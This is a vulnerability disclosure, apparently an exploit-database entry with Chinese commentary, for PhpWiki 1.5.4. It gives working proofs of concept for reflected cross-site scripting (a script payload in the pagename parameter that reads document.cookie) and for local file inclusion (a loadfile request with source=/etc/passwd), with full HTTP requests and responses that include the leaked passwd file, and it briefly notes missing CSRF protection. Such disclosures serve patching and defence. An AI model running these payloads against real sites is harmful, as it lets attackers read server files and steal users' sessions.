PhpWiki 1.5.4 Cross Site Scripting / Local File Inclusion

<p>1/ 跨站点脚本漏洞</p><p>跨站点脚本漏洞允许未经身份验证的远程用户通过GET或POST 参数将任意网页脚本注入代码。</p><p>Example url:<br><a href="http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--" rel="nofollow">http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--</a></p><p>Example request:<br>POST /phpwiki/index.php/UserPreferences HTTP/1.1<br>Host: 192.168.0.10<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>Accept-Language: pl,en-US;q=0.7,en;q=0.3<br>Accept-Encoding: gzip, deflate<br>Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin<br>Connection: keep-alive<br>Content-Type: application/x-www-form-urlencoded<br>Content-Length: 260</p><p>pref%5Bemail%5D=&amp;pref%5BnotifyPages%5D=&amp;pref%5Btheme%5D=&amp;pref%5Blang%5D=&amp;pref%5BeditHeight%5D=22&amp;pref%5BeditWidth%5D=80&amp;pref%5BtimeOffset%5D=0&amp;pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&amp;action=browse</p><p>Example response:<br>HTTP/1.1 200 OK<br>Date: Sat, 29 Aug 2015 21:30:47 GMT<br>Server: Apache/2.2.22 (Debian)<br>X-Powered-By: PHP/5.4.41-0+deb7u1<br>Vary: Accept-Encoding<br>Content-Length: 16114<br>Keep-Alive: timeout=5, max=100<br>Connection: Keep-Alive<br>Content-Type: text/html<br>(...)<br>&lt;script type="text/javascript"&gt;<br>&lt;!--//<br>var rateit_imgsrc = '/phpwiki/themes/wikilens/images/RateIt';<br>var rateit_action = 'RateIt';<br>// --&gt;&lt;/script&gt;<br>&lt;script type="text/javascript"&gt;<br>&lt;!--//<br>var data_path = '/phpwiki';<br>var pagename&nbsp; = 'UserPreferencesabc&lt;/script&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;!--';<br>var script_url= '/phpwiki/index.php';<br>var stylepath = data_path+'/themes/Sidebar/';<br>var folderArrowPath = '/phpwiki/themes/default/images';<br>var use_path_info = true;<br>// --&gt;&lt;/script&gt;<br>&lt;/head&gt;<br>(...)</p><p><br>2/ 本地文件漏洞</p><p>目录遍历漏洞在文件加载部分允许通过身份验证的攻击者通过参数读取任意文件。文件的内容将在创建页面中可用。</p><p>Example url:<br><a href="http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&amp;overwrite=1&amp;source=/etc/group" rel="nofollow">http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&amp;overwrite=1&amp;source=/etc/group</a></p><p>#1 - Example request:<br>POST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1<br>Host: 192.168.0.10<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>Accept-Language: pl,en-US;q=0.7,en;q=0.3<br>Accept-Encoding: gzip, deflate<br>Referer: <a href="http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration" rel="nofollow">http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration</a><br>Cookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625<br>Connection: keep-alive<br>Content-Type: application/x-www-form-urlencoded<br>Content-Length: 76</p><p>action=loadfile&amp;overwrite=&amp;pagename=PhpWikiAdministration&amp;source=/etc/passwd</p><p>#1 - Example response:<br>HTTP/1.1 200 OK<br>Date: Sat, 29 Aug 2015 22:09:36 GMT<br>Server: Apache/2.2.22 (Debian)<br>X-Powered-By: PHP/5.4.41-0+deb7u1<br>Vary: Accept-Encoding<br>Keep-Alive: timeout=5, max=100<br>Connection: Keep-Alive<br>Content-Type: text/html<br>Content-Length: 3534<br>(...)<br>&lt;a id="contentTop"&gt;&lt;/a&gt;<br>&lt;h1 class="firstHeading"&gt;Loading “/etc/passwd”&lt;/h1&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;div id="bodyContent"&gt;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;em&gt;&lt;a href="passwd" class="wiki"&gt;passwd&lt;/a&gt;&lt;/em&gt;&lt;span&gt; from “plain file /etc/passwd” content is identical to current version 1 - no new revision created&lt;/span&gt;&lt;p&gt;&lt;strong&gt;Complete.&lt;/strong&gt;&lt;/p&gt;<br>&lt;p&gt;Return to &lt;a href="PhpWikiAdministration" class="wiki"&gt;PhpWikiAdministration&lt;/a&gt;&lt;/p&gt;<br>(...)</p><p>#2 - Example request:<br>GET /phpwiki/index.php/passwd HTTP/1.1<br>Host: 192.168.0.10<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>Accept-Language: pl,en-US;q=0.7,en;q=0.3<br>Accept-Encoding: gzip, deflate<br>Referer: <a href="http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration" rel="nofollow">http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration</a><br>Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625<br>Connection: keep-alive</p><p>#2 - Example response:<br>HTTP/1.1 200 OK<br>Date: Sat, 29 Aug 2015 22:10:34 GMT<br>Server: Apache/2.2.22 (Debian)<br>X-Powered-By: PHP/5.4.41-0+deb7u1<br>ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8"<br>Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT<br>Cache-Control: must-revalidate<br>Expires: Sat, 29 Aug 2015 22:10:14 GMT<br>Vary: Cookie<br>Keep-Alive: timeout=5, max=100<br>Connection: Keep-Alive<br>Content-Type: text/html<br>Content-Length: 22599<br>(...)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br>&lt;div class="wikitext"&gt;&lt;p&gt;root:x:0:0:root:/root:/bin/bash<br>daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br>bin:x:2:2:bin:/bin:/bin/sh<br>sys:x:3:3:sys:/dev:/bin/sh<br>sync:x:4:65534:sync:/bin:/bin/sync<br>games:x:5:60:games:/usr/games:/bin/sh<br>man:x:6:12:man:/var/cache/man:/bin/sh<br>lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br>mail:x:8:8:mail:/var/mail:/bin/sh<br>&lt;a href="news:x:9:9:news:/var/spool/news:/bin/sh" target="_blank" class="namedurl"&gt;&lt;span style="white-space: nowrap"&gt;&lt;img src="/phpwiki/themes/Sidebar/images/url.png" alt="" class="linkicon" /&gt;news:x:9:9:news:/var/spool/news:/bin/sh&lt;/span&gt;&lt;/a&gt;<br>uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br>proxy:x:13:13:proxy:/bin:/bin/sh<br>www-data:x:33:33:www-data:/var/www:/bin/sh<br>backup:x:34:34:backup:/var/backups:/bin/sh<br>list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br>irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br>nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br>libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br>mysql:x:101:103:MySQL Server&lt;sub&gt;,:/nonexistent:/bin/false<br>messagebus:x:102:106::/var/run/dbus:/bin/false<br>colord:x:103:107:colord colour management daemon&lt;/sub&gt;,:/var/lib/colord:/bin/false<br>usbmux:x:104:46:usbmux daemon&lt;sub&gt;,:/home/usbmux:/bin/false<br>miredo:x:105:65534::/var/run/miredo:/bin/false<br>ntp:x:106:113::/home/ntp:/bin/false<br>Debian-exim:x:107:114::/var/spool/exim4:/bin/false<br>arpwatch:x:108:117:ARP Watcher&lt;/sub&gt;,:/var/lib/arpwatch:/bin/sh<br>avahi:x:109:118:Avahi mDNS daemon&lt;sub&gt;,:/var/run/avahi-daemon:/bin/false<br>beef-xss:x:110:119::/var/lib/beef-xss:/bin/false<br>dradis:x:111:121::/var/lib/dradis:/bin/false<br>pulse:x:112:122:&lt;span style="text-decoration: underline" class="wikiunknown"&gt;&lt;span&gt;PulseAudio&lt;/span&gt;&lt;a href="PulseAudio?action=create" title="Create: PulseAudio" onmouseover="window.status="Create: PulseAudio"; return true;" onmouseout="window.status='';return true;" rel="nofollow"&gt;?&lt;/a&gt;&lt;/span&gt; daemon&lt;/sub&gt;,:/var/run/pulse:/bin/false<br>speech-dispatcher:x:113:29:Speech Dispatcher&lt;sub&gt;,:/var/run/speech-dispatcher:/bin/sh<br>haldaemon:x:114:124:Hardware abstraction layer&lt;/sub&gt;,:/var/run/hald:/bin/false<br>iodine:x:115:65534::/var/run/iodine:/bin/false<br>postgres:x:116:127:PostgreSQL administrator&lt;sub&gt;,:/var/lib/postgresql:/bin/bash<br>sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin<br>redsocks:x:118:128::/var/run/redsocks:/bin/false<br>snmp:x:119:129::/var/lib/snmp:/bin/false<br>stunnel4:x:120:130::/var/run/stunnel4:/bin/false<br>statd:x:121:65534::/var/lib/nfs:/bin/false<br>sslh:x:122:133::/nonexistent:/bin/false<br>Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false<br>rtkit:x:124:136:&lt;span style="text-decoration: underline" class="wikiunknown"&gt;&lt;span&gt;RealtimeKit&lt;/span&gt;&lt;a href="RealtimeKit?action=create" title="Create: RealtimeKit" onmouseover="window.status="Create: RealtimeKit"; return true;" onmouseout="window.status='';return true;" rel="nofollow"&gt;?&lt;/a&gt;&lt;/span&gt;&lt;/sub&gt;,:/proc:/bin/false<br>saned:x:125:137::/home/saned:/bin/false<br>devil:x:1000:1001:devil&lt;sub&gt;,:/home/devil:/bin/bash<br>debian-tor:x:126:138::/var/lib/tor:/bin/false<br>privoxy:x:127:65534::/etc/privoxy:/bin/false<br>redis:x:128:139:redis server&lt;/sub&gt;,:/var/lib/redis:/bin/false&lt;/p&gt;<br>&lt;/div&gt;<br>(...)</p><p><br>3/ 跨站点伪造请求漏洞<br>由于应用没有CSRF保护，远程攻击者可以触发特定的动作。<br></p>